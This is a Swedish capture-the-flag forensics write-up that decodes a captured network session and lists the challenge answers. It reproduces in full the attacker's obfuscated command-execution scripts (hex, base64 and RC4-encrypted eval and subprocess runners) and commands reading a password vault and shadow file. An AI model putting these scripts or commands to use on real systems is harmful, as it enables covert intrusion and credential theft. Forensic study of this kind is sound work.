This write-up is in Swedish. I may translate it to
English in the future.
“Vad har en av nätverkets klienter för sig? Förstå trafiken och svara på frågorna.
(16821 bytes, sha256: e260730a555a30b8bd312c6f00be816353b22f72fdbfd0bdf19403727ae20212)”
Frågor och svar#
- Vilka kommandon körs i första steget?
ls -la
netstat
- Vilka kommandon körs i andra steget?
ls -la
ls -la backup/
cat backup/pw_vault
cat backup/shadow_copy
ls private
ls work
- Vilket lösenord har user2?
HorseHatBatteryStaple
- När sker anfallet?
Vid gryningen.
- Vilka vapen kommer de använda?
Svärd och/eller interkontinental ballistisk robot.
Sammanfattning av incidenten#
Med hjälp av obfuskerade kommandon exfiltrerades känslig information från
datorn. Framförallt fick förövarna tag på inloggningsuppgifter (användarnamn och
lösenord) till en av datorns användare med administrativa privilegier, samt en
kopia av den lösenordsskyddade filen ~/work/secret_plans.zip. Även filens
lösenord, som fanns sparat i historik, exfiltrerades.
Tekniskt detaljerad beskrivning#
Nätverktrafiken innehåller en TCP-ström (fås exempelvis med
tshark -q -r trafik.pcap -z follow,tcp,ascii,0):
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd1')"
746f74616c2038340a64727778722d78722d7820313020757365723120757365723120343...
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd2')"
41637469766520496e7465726e657420636f6e6e656374696f6e732028772f6f207365727...
<3vil$hell:#> python3 -c "import f1 as f; r=f.A.d('696d706f7274207379730a...
...72696e742872290a202020207072696e7428422e65287229290a');print(r)" > f2.py
<3vil$hell:#> python3 -c "import f2 as f;e=f.B.e('d');print(e)"
za==
<3vil$hell:#> python3 -c "import f2 as f;f.run('wydscycsjy1sysdd')"
dg90ywwgodgkzhj3ehitehitecaxmcb1c2vymsb1c2vymsa0mdk2ie1hciaynsawodowocauc...
<3vil$hell:#> python3 -c "import f2 as f;f.run('wydscycsjy1syscsj2jhy2t1c...
dg90ywwgmtykzhj3ehj3ec0tlsagmib1c2vymsb1c2vymsa0mdk2iezlyiagmyawodoxmcauc...
<3vil$hell:#> python3 -c "import f2 as f;f.run('wydjyxqnlcdiywnrdxavchdfd...
qwnjb3vudhm6ciagvxnlcgkjugfzcwogic0tls0tls0tls0tls0tciagcm9vdcagicagiaogi...
<3vil$hell:#> python3 -c "import f2 as f;f.run('wydjyxqnlcdiywnrdxavc2hhz...
cm9vddo0yzuymzq3m2ixotm3mzzkn2uwmgvjnme5ymuxndgwytzimtbhy2u1mtg0nzg0yjnmy...
<3vil$hell:#> python3 -c "import f2 as f;f.run('wydscycsj3byaxzhdgunxq==')"
ymfua19kzxrhawxzcnbob3rvcwo=
<3vil$hell:#> python3 -c "import f2 as f;f.run('wydscycsj3dvcmsnxq==')"
bwfpbhmkbwvldgluzybwcm90b2nvbhmkchjvc3bly3rzcnnjcmlwdhmkc2vjcmv0x3bsyw5zl...
<3vil$hell:#> python3 -c "import f2 as f; r=f.B.d('aw1wb3j0ihn1ynbyb2nlc3...
...icagzxhly3v0zshzexmuyxjndlsxxswgc3lzlmfyz3zbml0pcgok');print(r)" > f3.py
<3vil$hell:#> python3 f3.py 1b17574cd639192cd70e file.txt
<3vil$hell:#> python3 f3.py 335f575790670c7a8c5218e71c0e7f98dc6a1b3a6f9bc...
1b0c5e4ec23f113cef340ebd0c1379cdca6d61
<3vil$hell:#> python3 f3.py a5ad93b50fa02e50fef36c82
8dfe9ba95df8335d98e624ab6c98914e8a2c480264c04ff1309287accd417ffbb59b892ad...
<3vil$hell:#> python3 f3.py a5ad93b50fa02e0afde020f02aa9
8dfe9ba95df8335d98ff2ab66187bb1ad94358197ddf1dac3a8fdebb8e1f23a8ca989e379...
<3vil$hell:#> python3 f3.py a5ad8aa852e5795abeb53cb07f9f9e04d9455e1567e74...
file is password-protected.
<3vil$hell:#> python3 f3.py a5ad9ca75cab255af0f338b7529cd804c8495e0934e5
8dfe9ba95df8335d98e13ebb62d4d007c8065f1572ca5eb46897c3a6880327bab283e62b9...
<3vil$hell:#> python3 f3.py a5ad97a20fa02e50e4b567f87a9bc31c9355491361dd4...
8dfe9ba95df8335d98a27bef3dc481478c060c45239809be68d099f4dd446feba1c8dc68c...
<3vil$hell:#>
Kommunikationen kan delas upp i tre efter varandra följande delar som är obfuskerade på olika sätt. Dessa följer numrerade nedan.
(1) f1.py#
Den första delen
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd1')"
746f74616c2038340a64727778722d78722d7820313020757365723120757365723120343...
<3vil$hell:#> python3 -c "import f1 as f; a = f.A('cmd2')"
41637469766520496e7465726e657420636f6e6e656374696f6e732028772f6f207365727...
<3vil$hell:#> python3 -c "import f1 as f; r=f.A.d('696d706f7274207379730a...
...72696e742872290a202020207072696e7428422e65287229290a');print(r)" > f2.py
använder sig av f1.py:
#!/usr/bin/python3
import sys
import subprocess as s
import commands as cm
class A(object):
def __init__(self, k):
# self.r = sub.run(cm.c[str(k)])
self.r = s.run(cm.c[str(k)],stdout=s.PIPE).stdout.decode()
print(str(self))
def __str__(self):
# return A.e(self.r.stdout.decode())
return A.e(self.r)
@staticmethod
def h(x):
return "%0.2x" % ord(x)
# return repr(chr(ord(x)))
@staticmethod
def e(x):
o = ''.join([str(A.h(c)) for c in x])
return o
@staticmethod
def d(x):
o = ''
i = 0
while i < len(x):
o += str(chr(int(x[i:i+2], 16)))
i += 2
return o
Först körs två kommandon vars utdata hexkodats. Avkodat är deras respektive utdata
total 84
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:08 .
drwxr-xr-x 17 user1 user1 4096 Mar 25 08:06 ..
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 backup
-rw-rw-r-- 1 user1 user1 1096 Mar 25 07:37 bash_history
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 .bashrc
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 commands.py
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Documents
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Downloads
-rwxrwx--- 1 user1 user1 596 Feb 1 10:12 f1.py
-rwxrwx--- 1 user1 user1 6430 Feb 2 02:24 nc
-rwxrwx--- 1 user1 user1 9847 Mar 25 07:23 nc2
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Pictures
drwxrwx--- 3 user1 user1 4096 Feb 1 06:39 private
drwxr-xr-x 2 user1 user1 4096 Mar 25 08:08 __pycache__
-rw-rw-r-- 1 user1 user1 5503 Mar 25 08:05 README
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Videos
drwxrwx--- 6 user1 user1 4096 Mar 25 07:39 work
och
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost:8307 localhost:59580 ESTABLISHED
tcp 0 0 user:43215 worker:ssh ESTABLISHED
tcp 0 0 localhost:55412 localhost:https ESTABLISHED
tcp 509 0 user1:40145 webproxy.myweb:http-alt CLOSE_WAIT
tcp 0 0 localhost:https localhost:54789 ESTABLISHED
tcp 0 0 localhost:44223 localhost:1111 ESTABLISHED
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 33489 /run/user/1000/systemd/notify
unix 2 [ ] DGRAM 23543 /run/user/120/systemd/notify
unix 3 [ ] DGRAM 15950 /run/systemd/notify
unix 9 [ ] DGRAM 15961 /run/systemd/journal/socket
unix 2 [ ] DGRAM 15983 /run/systemd/journal/syslog
unix 29 [ ] DGRAM 16002 /run/systemd/journal/dev-log
unix 3 [ ] STREAM CONNECTED 50044
unix 2 [ ] STREAM CONNECTED 46503
unix 3 [ ] STREAM CONNECTED 40504
unix 3 [ ] STREAM CONNECTED 36404
unix 3 [ ] STREAM CONNECTED 41170 /run/systemd/journal/stdout
Denna utdata stämmer överens med kommandona ls -la respektive netstat, men
precis vad ‘cmd1’ och ‘cmd2’ är bestäms av dictionary c i ~/commands.py.
Slutligen skapas f2.py genom att avkoda en hexsträng.
(2) f2.py#
Den andra delen
<3vil$hell:#> python3 -c "import f2 as f;e=f.B.e('d');print(e)"
ZA==
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJy1sYSdd')"
dG90YWwgODgKZHJ3eHIteHIteCAxMCB1c2VyMSB1c2VyMSA0MDk2IE1hciAyNSAwODowOCAuC...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJy1sYScsJ2JhY2t1c...
dG90YWwgMTYKZHJ3eHJ3eC0tLSAgMiB1c2VyMSB1c2VyMSA0MDk2IEZlYiAgMyAwODoxMCAuC...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydjYXQnLCdiYWNrdXAvcHdfd...
QWNjb3VudHM6CiAgVXNlcgkJUGFzcwogIC0tLS0tLS0tLS0tLS0tCiAgcm9vdCAgICAgIAogI...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydjYXQnLCdiYWNrdXAvc2hhZ...
cm9vdDo0YzUyMzQ3M2IxOTM3MzZkN2UwMGVjNmE5YmUxNDgwYTZiMTBhY2U1MTg0Nzg0YjNmY...
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJ3ByaXZhdGUnXQ==')"
YmFua19kZXRhaWxzCnBob3Rvcwo=
<3vil$hell:#> python3 -c "import f2 as f;f.run('WydscycsJ3dvcmsnXQ==')"
bWFpbHMKbWVldGluZyBwcm90b2NvbHMKcHJvc3BlY3RzCnNjcmlwdHMKc2VjcmV0X3BsYW5zL...
<3vil$hell:#> python3 -c "import f2 as f; r=f.B.d('aW1wb3J0IHN1YnByb2Nlc3...
...ICAgZXhlY3V0ZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgoK');print(r)" > f3.py
använder sig av f2.py:
import sys
import subprocess as s
import commands as cm
class B(object):
@staticmethod
def e(x):
o = cm.c['func1'](x.encode())
return o.decode()
@staticmethod
def d(x):
o = cm.c['func2'](x.encode())
return o.decode()
def run(cmd):
dec = eval(B.d(cmd))
r = s.run(dec, stdout=s.PIPE).stdout.decode()
# print(r)
print(B.e(r))
Exakt hur kommunikationen obfuskerats beror av ‘func1’ och ‘func2’ som
bestäms av dictionary c i ~/commands.py, men av allt att dömma så körs
base64-kodade kommandon vars utdata också base64-kodas. Avkodade kommandon och
utdata följer nedan.
['ls','-la']
total 88
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:08 .
drwxr-xr-x 17 user1 user1 4096 Mar 25 08:06 ..
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 backup
-rw-rw-r-- 1 user1 user1 1096 Mar 25 07:37 bash_history
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 .bashrc
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 commands.py
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Documents
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Downloads
-rwxrwx--- 1 user1 user1 596 Feb 1 10:12 f1.py
-rw-r--r-- 1 user1 user1 391 Mar 25 08:08 f2.py
-rwxrwx--- 1 user1 user1 6430 Feb 2 02:24 nc
-rwxrwx--- 1 user1 user1 9847 Mar 25 07:23 nc2
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Pictures
drwxrwx--- 3 user1 user1 4096 Feb 1 06:39 private
drwxr-xr-x 2 user1 user1 4096 Mar 25 08:08 __pycache__
-rw-rw-r-- 1 user1 user1 5503 Mar 25 08:05 README
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Videos
drwxrwx--- 6 user1 user1 4096 Mar 25 07:39 work
['ls','-la','backup/']
total 16
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 .
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:08 ..
-rwxrwx--- 1 user1 user1 0 Feb 1 03:08 .bashhist
-rwxrwx--- 1 user1 user1 126 Feb 3 08:10 pw_vault
-rwxrwx--- 1 user1 user1 352 Feb 2 01:38 shadow_copy
['cat','backup/pw_vault']
Accounts:
User Pass
--------------
root
user1 sommar2019
user2 HorseHatBatteryStaple
user3
['cat','backup/shadow_copy']
root:4c523473b193736d7e00ec6a9be1480a6b10ace5184784b3fabb331fcae40357 // notes: root-priviledges pw: --
user1:d146c62ff4a1b1552bfe162b86d7a656a26d2ad1cf812c4fb3eea0c272bc313b // notes: non_root-priv pw: sommar2020
user2:6008534dbeb34eb413a308f06067bb7f7060582e0b5b3d85c3e35bd07948c437 // notes: root_priviledges pw: HorseHatBatteryStaple
user3:
['ls','private']
bank_details
photos
['ls','work']
mails
meeting protocols
prospects
scripts
secret_plans.zip
Slutligen skapas f3.py genom att avkoda en base64-kodad sträng.
(3) f3.py#
Den sista delen
<3vil$hell:#> python3 f3.py 1b17574cd639192cd70e file.txt
<3vil$hell:#> python3 f3.py 335f575790670c7a8c5218e71c0e7f98dc6a1b3a6f9bc...
1b0c5e4ec23f113cef340ebd0c1379cdca6d61
<3vil$hell:#> python3 f3.py a5ad93b50fa02e50fef36c82
8dfe9ba95df8335d98e624ab6c98914e8a2c480264c04ff1309287accd417ffbb59b892ad...
<3vil$hell:#> python3 f3.py a5ad93b50fa02e0afde020f02aa9
8dfe9ba95df8335d98ff2ab66187bb1ad94358197ddf1dac3a8fdebb8e1f23a8ca989e379...
<3vil$hell:#> python3 f3.py a5ad8aa852e5795abeb53cb07f9f9e04d9455e1567e74...
File is password-protected.
<3vil$hell:#> python3 f3.py a5ad9ca75cab255af0f338b7529cd804c8495e0934e5
8dfe9ba95df8335d98e13ebb62d4d007c8065f1572ca5eb46897c3a6880327bab283e62b9...
<3vil$hell:#> python3 f3.py a5ad97a20fa02e50e4b567f87a9bc31c9355491361dd4...
8dfe9ba95df8335d98a27bef3dc481478c060c45239809be68d099f4dd446feba1c8dc68c...
använder sig av f3.py:
import subprocess as sub
def ed(data, key):
# encryptor / decryptor
# return value is binary
x = 0
box = list(range(256))
for i in range(256):
x = (x + box[i] + ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x,y = 0, 0
out = []
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
return ''.join(out)
def h(x):
# hex one character
return "%0.2x" % ord(x)
def c(s):
# encode a string s, calls h(x) on each character
return ''.join([str(h(c)) for c in s])
def g(x):
# un-hex a hex-string into a ascii-string
o = ''
i = 0
while i < len(x):
o += str(chr(int(x[i:i+2], 16)))
i += 2
return o
def execute(cmd, f=None):
try:
with open('pass.txt', 'r') as _f:
pw = _f.read().strip()
except Exception as e:
# print(e)
pw = 'default_pass'
# print(pw)
cmd = g(cmd)
cmd = ed(cmd, pw)
# print(cmd)
if f is not None: # f is set,
with open(f, 'w') as _f:
_f.write(cmd)
_f.write('\n')
else:
cmd = eval(cmd)
m = sub.run(cmd, stdout=sub.PIPE,stderr=sub.PIPE)
# print('out', m.stdout.decode())
# print('err', m.stderr.decode())
mout = 'stdout: \n' + m.stdout.decode() + '\n'
mout += 'stderr: \n' + m.stderr.decode()
# print(mout)
mout = c(ed(mout, pw))
print(mout)
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
execute(sys.argv[1])
if len(sys.argv) == 3:
execute(sys.argv[1], sys.argv[2])
In- och utdata är krypterat (med ed(2)) och hexkodat. Avkryptering görs med
samma funktion och nyckel som krypteringen. Nyckeln att använda specificeras i
filen pass.txt, och om filen saknas används en förvald hårdkodad nyckel
('default_pass'). Med två argument till f3.py avkodas och avkrypteras
argument 1 och placeras i filen som ges av argument 2. Med endast ett argument
avkodas och avkrypteras det för att sedan köras som ett kommando.
För att tyda trafiken behöver man alltså avkoda hexsträngarna och avkryptera med
rätt nyckel. Nedan följer trafiken, fast med data i klartext.
Avkrypteringsnyckeln är till en början 'default_pass' eftersom filen
pass.txt saknas.
<3vil$hell:#> python3 f3.py sommar2020 file.txt
<3vil$hell:#> python3 f3.py ['mv','file.txt','pass.txt']
stdout:
stderr:
Nu finns filen pass.txt med innehållet sommar2020. Resterande data
avkrypteras alltså med nyckeln sommar2020.
<3vil$hell:#> python3 f3.py ['ls','-la']
stdout:
total 96
drwxr-xr-x 10 user1 user1 4096 Mar 25 08:09 .
drwxr-xr-x 17 user1 user1 4096 Mar 25 08:06 ..
drwxrwx--- 2 user1 user1 4096 Feb 3 08:10 backup
-rw-rw-r-- 1 user1 user1 1096 Mar 25 07:37 bash_history
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 .bashrc
-rwxrwx--- 1 user1 user1 173 Feb 1 08:37 commands.py
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Documents
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Downloads
-rwxrwx--- 1 user1 user1 596 Feb 1 10:12 f1.py
-rw-r--r-- 1 user1 user1 391 Mar 25 08:08 f2.py
-rw-r--r-- 1 user1 user1 1747 Mar 25 08:09 f3.py
-rwxrwx--- 1 user1 user1 6430 Feb 2 02:24 nc
-rwxrwx--- 1 user1 user1 9847 Mar 25 07:23 nc2
-rw-r--r-- 1 user1 user1 11 Mar 25 08:09 pass.txt
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Pictures
drwxrwx--- 3 user1 user1 4096 Feb 1 06:39 private
drwxr-xr-x 2 user1 user1 4096 Mar 25 08:08 __pycache__
-rw-rw-r-- 1 user1 user1 5503 Mar 25 08:05 README
drwxr-xr-x 2 user1 user1 4096 Feb 3 07:54 Videos
drwxrwx--- 6 user1 user1 4096 Mar 25 07:39 work
stderr:
<3vil$hell:#> python3 f3.py ['ls','work/']
stdout:
mails
meeting protocols
prospects
scripts
secret_plans.zip
stderr:
<3vil$hell:#> python3 f3.py ['unzip','work/secret_plans.zip']
File is password-protected.
<3vil$hell:#> python3 f3.py ['cat','bash_history']
stdout:
sudo apt search wireshark
sudo apt install wireshark
python
sudo apt install python
sudo apt install python3.6
sudo apt install ipython3
which python
python
python3
history
man history
ld
ls
ping 8.8.8.8
sudo wireshark
ipython
ipython3
python3
ipython3
netstat
ifconfig
ls -la backup/
cat backup/pw_vault
ls -la backup/
cat backup/pw_vault
ls -la backup/
python
python3
ipython3
ls backup/
ls
ls
ls -la
cd work
ls
cd ..
ls
ls -la
cd work
ls
cd scripts
cd ..
cd plans
ls
cat attack_plans_VERY_SECRET.txt
cat drawing_of_our_new_wepon_VERY_SECRET.txt
nano drawing_of_our_new_wepon_VERY_SECRET.txt
cat drawing_of_our_new_wepon_VERY_SECRET.txt
nano drawing_of_our_new_wepon_VERY_SECRET.txt
nano attack_plans_VERY_SECRET.txt
nano drawing_of_our_new_wepon_VERY_SECRET.txt
cat drawing_of_our_new_wepon_VERY_SECRET.txt
cd ..
man zip
zip -r -P supersecretpassword secret_plans.zip plans
rm -rf plans
cd ..
private
cd private/
ls
cd ..
ls
ipython3
history
ls
ls
cd ..
cd ..
cd ..
ls
man unzip
history
cat .bash_history
ipython
ipython3
ls
mv plans plans2
ipython3
ipython
ipython3
ipython3
netstat
stderr:
<3vil$hell:#> python3 f3.py ['hd','-v','work/secret_plans.zip']
stdout:
00000000 50 4b 03 04 0a 00 00 00 00 00 84 7b 79 50 00 00 |PK.........{yP..|
00000010 00 00 00 00 00 00 00 00 00 00 06 00 1c 00 70 6c |..............pl|
00000020 61 6e 73 2f 55 54 09 00 03 78 6a 7b 5e 8a 6a 7b |ans/UT...xj{^.j{|
00000030 5e 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 |^ux.............|
00000040 50 4b 03 04 14 00 09 00 08 00 80 7b 79 50 a0 2d |PK.........{yP.-|
00000050 9f 8d 22 01 00 00 87 04 00 00 22 00 1c 00 70 6c |.."......."...pl|
00000060 61 6e 73 2f 61 74 74 61 63 6b 5f 70 6c 61 6e 73 |ans/attack_plans|
00000070 5f 56 45 52 59 5f 53 45 43 52 45 54 2e 74 78 74 |_VERY_SECRET.txt|
00000080 55 54 09 00 03 6f 6a 7b 5e f3 6a 7b 5e 75 78 0b |UT...oj{^.j{^ux.|
00000090 00 01 04 e8 03 00 00 04 e8 03 00 00 bb 56 7f 4a |.............V.J|
000000a0 94 9c 6f e5 a3 14 44 8b 19 5a 8d e0 ed b3 14 29 |..o...D..Z.....)|
000000b0 19 0a 45 94 01 0a b5 da 98 48 99 15 79 d1 25 36 |..E......H..y.%6|
000000c0 e8 e6 70 fb 9c f1 fd 78 ba db 5a 2e ad 27 b4 db |..p....x..Z..'..|
000000d0 9f 89 09 62 e0 00 32 92 90 a7 69 32 48 ed ae 3d |...b..2...i2H..=|
000000e0 d0 5f c4 42 46 c0 bb 9d 70 95 13 a2 73 df 98 5c |._.BF...p...s..\|
000000f0 7e ac b4 b7 45 a9 e2 9d 6c 7d 05 49 0b 3f d1 91 |~...E...l}.I.?..|
00000100 b7 30 e7 5e 06 32 dc c2 90 05 cd ad b3 55 34 1f |.0.^.2.......U4.|
00000110 8b 10 87 38 fc 99 16 07 50 53 d5 d1 75 b4 fd f8 |...8....PS..u...|
00000120 54 5f 9b e6 cd 98 33 50 fc 68 bb f9 2a d2 16 76 |T_....3P.h..*..v|
00000130 4b fe d1 37 d7 ac e1 0b 64 10 01 45 a7 96 d8 2e |K..7....d..E....|
00000140 8c 79 a8 0e 58 c4 ed ac 7f 55 7f e2 1b ef 1d 68 |.y..X....U.....h|
00000150 95 6f 67 9b ba 55 56 1e 8b 5f 1a 2c 18 c2 a3 a7 |.og..UV.._.,....|
00000160 10 43 a8 aa 65 86 aa d9 ed c9 5d fd ec d3 d7 62 |.C..e.....]....b|
00000170 ae b6 f7 0d 98 c4 fc 22 af 11 a4 3e e2 92 f2 eb |......."...>....|
00000180 ed 59 88 3f 86 62 65 12 b9 69 5c ad 35 2e f6 b3 |.Y.?.be..i\.5...|
00000190 b3 65 ed 4f 81 22 9b 39 88 39 46 8a 2b ad 71 93 |.e.O.".9.9F.+.q.|
000001a0 92 46 9e 20 96 15 fc dd c3 65 89 2e 37 a6 c6 d4 |.F. .....e..7...|
000001b0 e0 9a d1 8a 91 ca b2 87 a4 5c 91 4a 3a 5c 50 4b |.........\.J:\PK|
000001c0 07 08 a0 2d 9f 8d 22 01 00 00 87 04 00 00 50 4b |...-..".......PK|
000001d0 03 04 14 00 09 00 08 00 84 7b 79 50 e0 dd b7 d4 |.........{yP....|
000001e0 eb 00 00 00 ce 02 00 00 2f 00 1c 00 70 6c 61 6e |......../...plan|
000001f0 73 2f 64 72 61 77 69 6e 67 5f 6f 66 5f 6f 75 72 |s/drawing_of_our|
00000200 5f 6e 65 77 5f 77 65 61 70 6f 6e 5f 56 45 52 59 |_new_weapon_VERY|
00000210 5f 53 45 43 52 45 54 2e 74 78 74 55 54 09 00 03 |_SECRET.txtUT...|
00000220 78 6a 7b 5e f3 6a 7b 5e 75 78 0b 00 01 04 e8 03 |xj{^.j{^ux......|
00000230 00 00 04 e8 03 00 00 8c 34 0f 86 17 1a 87 29 f5 |........4.....).|
00000240 ae 0e 36 7f 9e d1 20 46 ae 75 00 fc 4a 53 de 84 |..6... F.u..JS..|
00000250 42 45 00 d7 59 75 17 1a ae 29 72 c6 90 19 bb db |BE..Yu...)r.....|
00000260 8a 9f f9 c8 f7 b5 37 a6 7d bd 3d fb ec 7d 61 b6 |......7.}.=..}a.|
00000270 5c 48 2e 25 05 56 bd ac 1e 4c bb 36 2c 60 68 96 |\H.%.V...L.6,`h.|
00000280 9f 3a 21 2c e5 2f 49 0b 92 9d c1 b8 df 66 3d 89 |.:!,./I......f=.|
00000290 5a ae 51 fb 3b db 31 85 15 17 2c ea a4 bd 43 e7 |Z.Q.;.1...,...C.|
000002a0 b4 34 02 6a cc 6b d5 bb 14 55 a2 d0 01 c8 07 97 |.4.j.k...U......|
000002b0 13 d4 2f 2e d0 20 43 04 99 45 11 eb 9a 15 7c 1f |../.. C..E....|.|
000002c0 b7 68 c0 7d ae 26 8c 63 5e a0 92 9d 2a 8a 7a 75 |.h.}.&.c^...*.zu|
000002d0 5b 31 d2 41 a7 08 b8 a5 fe 6b 6f 66 b7 75 1d bd |[1.A.....kof.u..|
000002e0 1f 49 37 3d 51 0e 7e e5 9e 40 96 e9 40 62 20 f2 |.I7=Q.~..@..@b .|
000002f0 6a 47 9e cc 9a e3 72 10 83 10 78 b1 cd ad 7c 2c |jG....r...x...|,|
00000300 8d 06 42 dc ed 7a 08 af ce 2b a6 83 47 07 2d 57 |..B..z...+..G.-W|
00000310 dc 8a 69 81 d8 cb 8f 18 30 75 3a 67 af 86 b1 45 |..i.....0u:g...E|
00000320 fe 17 50 4b 07 08 e0 dd b7 d4 eb 00 00 00 ce 02 |..PK............|
00000330 00 00 50 4b 01 02 1e 03 0a 00 00 00 00 00 84 7b |..PK...........{|
00000340 79 50 00 00 00 00 00 00 00 00 00 00 00 00 06 00 |yP..............|
00000350 18 00 00 00 00 00 00 00 10 00 ed 41 00 00 00 00 |...........A....|
00000360 70 6c 61 6e 73 2f 55 54 05 00 03 78 6a 7b 5e 75 |plans/UT...xj{^u|
00000370 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 50 4b |x.............PK|
00000380 01 02 1e 03 14 00 09 00 08 00 80 7b 79 50 a0 2d |...........{yP.-|
00000390 9f 8d 22 01 00 00 87 04 00 00 22 00 18 00 00 00 |..".......".....|
000003a0 00 00 01 00 00 00 b4 81 40 00 00 00 70 6c 61 6e |........@...plan|
000003b0 73 2f 61 74 74 61 63 6b 5f 70 6c 61 6e 73 5f 56 |s/attack_plans_V|
000003c0 45 52 59 5f 53 45 43 52 45 54 2e 74 78 74 55 54 |ERY_SECRET.txtUT|
000003d0 05 00 03 6f 6a 7b 5e 75 78 0b 00 01 04 e8 03 00 |...oj{^ux.......|
000003e0 00 04 e8 03 00 00 50 4b 01 02 1e 03 14 00 09 00 |......PK........|
000003f0 08 00 84 7b 79 50 e0 dd b7 d4 eb 00 00 00 ce 02 |...{yP..........|
00000400 00 00 2f 00 18 00 00 00 00 00 01 00 00 00 b4 81 |../.............|
00000410 ce 01 00 00 70 6c 61 6e 73 2f 64 72 61 77 69 6e |....plans/drawin|
00000420 67 5f 6f 66 5f 6f 75 72 5f 6e 65 77 5f 77 65 61 |g_of_our_new_wea|
00000430 70 6f 6e 5f 56 45 52 59 5f 53 45 43 52 45 54 2e |pon_VERY_SECRET.|
00000440 74 78 74 55 54 05 00 03 78 6a 7b 5e 75 78 0b 00 |txtUT...xj{^ux..|
00000450 01 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 |...........PK...|
00000460 00 00 00 03 00 03 00 29 01 00 00 32 03 00 00 00 |.......)...2....|
00000470 00 |.|
00000471
stderr:
<3vil$hell:#>
Notera att bash-historiken avslöjar lösenordet som valdes när secret_plans.zip
skapades. Filen själv kan återfås ur hexdumpen (utdatan från det sista
kommandot) med hjälp av ett script.
secret_plans.zip innehåller två filer:
plans/attack_plans_VERY_SECRET.txt
VERY VERY SUPERDUPER SECRET DOCUMENT
====================================
WARNING
DO NOT DISTRIBUTE TO ANYONE!!!
ABSOLUTELY NOT TO THE ENEMY!!!
===================================
When?
Timing is essential. Therefore we start the attack AT DAWN to take the enemy by surprise!
Attack plan:
\
======\
OUR FORCES ======= ENEMY FORCES
======/
/
===||
===|| |==
( > ' ' )> ( > ' ' )> ( > ' ' )>|| |<("<) <("<) <("<) <("<) <("<)
( > ' ' )> ( > ' ' )> ( > ' ' )> <("<) <("<) <("<) <("<) <("<)
( > ' ' )> ( > ' ' )> ( > ' ' )> <("<) <("<) <("<) <("<) <("<)
( > ' ' )> ( > ' ' )> ( > ' ' )> <("<) <("<) <("<) <("<) <("<)
plans/drawing_of_our_new_weapon_VERY_SECRET.txt
VERY VERY SUPERDUPER SECRET DOCUMENT
====================================
WARNING
DO NOT DISTRIBUTE TO ANYONE!!!
ABSOLUTELY NOT TO THE ENEMY!!!
===================================
IDEA 1:
//
o====||==================> <------ pointy end, toward enemy
\\
IDEA 2:
*
***
******
*******************************************
* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ **
* **
******* - - - - - - I C B M - - - - - - - - - ********
* **
* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ **
*******************************************
******
***
*